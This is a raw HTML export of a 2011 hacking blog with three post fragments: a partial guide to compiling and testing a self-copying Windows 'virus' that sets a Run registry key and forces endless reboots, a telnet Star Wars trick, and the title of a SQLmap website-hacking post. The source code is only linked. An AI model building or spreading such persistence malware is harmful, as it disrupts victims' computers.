0px; padding-top: 0px; vertical-align: baseline;">Compiling The Scource Code Into Executable Virus.</strong></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><span class="Apple-style-span" style="color: yellow;">1. Download the <a href="http://www.hackingsucks.com/wp-content/uploads/2011/04/SysRes.c" style="border-bottom-color: rgb(238, 238, 238); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Source Code Here</strong></a></span></div><span class="Apple-style-span" style="color: yellow;"><ins style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-style: initial; border-top-style: none; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><ins id="aswift_2_anchor" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: block; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" id="aswift_2" marginheight="0" marginwidth="0" name="aswift_2" scrolling="no" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; left: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: absolute; top: 0px; vertical-align: baseline;" vspace="0" width="468"></iframe></ins></ins><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">2. The downloaded file will be <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Sysres.C</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><br />
</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Testing And Removing The Virus From Your PC</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">You can compile and test this virus on your own PC without any fear. To test, just doubleclick the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sysres.exe</strong> file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.<br />
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">1. Reboot your computer in the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">SAFE MODE</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">2. Goto</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X:WindowsSystem</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">(<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X</strong> can be C,D,E or F)</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">3.You will find a file by name <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sysres.exe</strong>, delete it.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">4.Type <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">regedit </strong>in <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">run</strong>.You will goto registry editor.Here navigate to</div><ins style="border-bottom-style: none; border-color: initial; border-color: initial; border-left-style: none; border-right-style: none; border-style: initial; border-top-style: none; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><ins id="aswift_3_anchor" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: block; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" id="aswift_3" marginheight="0" marginwidth="0" name="aswift_3" scrolling="no" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; left: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: absolute; top: 0px; vertical-align: baseline;" vspace="0" width="468"></iframe></ins></ins><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">HKEY_CURRENT_USERSoftwareMicrosoftWindows CurrentVersionRun</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">There, on the right site you will see an entry by name “<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sres</strong>“.Delete this entry.That’s it.You have removed this Virus successfully.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Logic Behind The Working Of The Virus</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">If I don’t explain the logic(<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Algorithm</strong>) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program.<strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"> If you have further doubts please pass comments.</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">LOGIC:</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">1. First the virus will find the Root partition (Partition on which Windows is installed).</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">2. Next it will determine whether the Virus file is already copied(Already infected) into <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X:WindowsSystem</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">3. If not it will just place a copy of itself into <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X:WindowsSystem</strong> and makes a registry entry to put this virus file onto the startup.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">4. Or else if the virus is already found in the <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">X:WindowsSystem</strong> directory(folder), then it just gives a command to <strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">restart</strong> the computer.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 1.6em; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify; vertical-align: baseline;">This process is repeated every time the PC is restarted.</div><span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="border-color: initial; border-color: initial; border-style: initial; border-width: initial; font-style: inherit; height: 60px;"><ins style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: inline-table; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; height: 60px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; position: relative; vertical-align: baseline; visibility: visible; width: 468px;"></ins></span></span></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-45332112228390587092011-07-29T08:45:00.001-07:002011-07-29T08:45:30.185-07:00Star Wars Movie Hidden in every Computer<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"></span><br />
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Would you believe if I say that <em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">every computer has a </strong><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">hidden Star Wars Movie</strong></em> Inside it?</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Don’t believe me.. Read on..</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Every computer, no matter what windows you are using has a star wars movie inside it. You just need to have Telnet enabled in it.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Its basically a Telnet command but it can make you really cool among your friends.:P</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Now moving on to the Star Wars part.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">Just copy the command below and paste it in Run.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">You should be connected to the INTERNET for using this.</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">1) Go to Starts–>Programs–>Run</em></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">2) Type</em></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;"><em style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">telnet towel.blinkenlights.nl</strong></em></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">And hit enter……… Enjoy the magic!</div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 15px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center;">I hope you liked it.</div></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-80450249491417982242011-07-29T08:18:00.000-07:002011-07-29T08:19:31.725-07:00Hack website using SQL map | automatic SQL injection tool<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: #333333; font-family: Helvetica, Arial, 'Lucida Grande', Verdana, sans-serif; font-size: 12px; line-height: 18px;"></span><br />
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center; vertical-align: baseline;"><strong style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Hack website using SQL map | automatic SQL injection tool</strong></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: center; 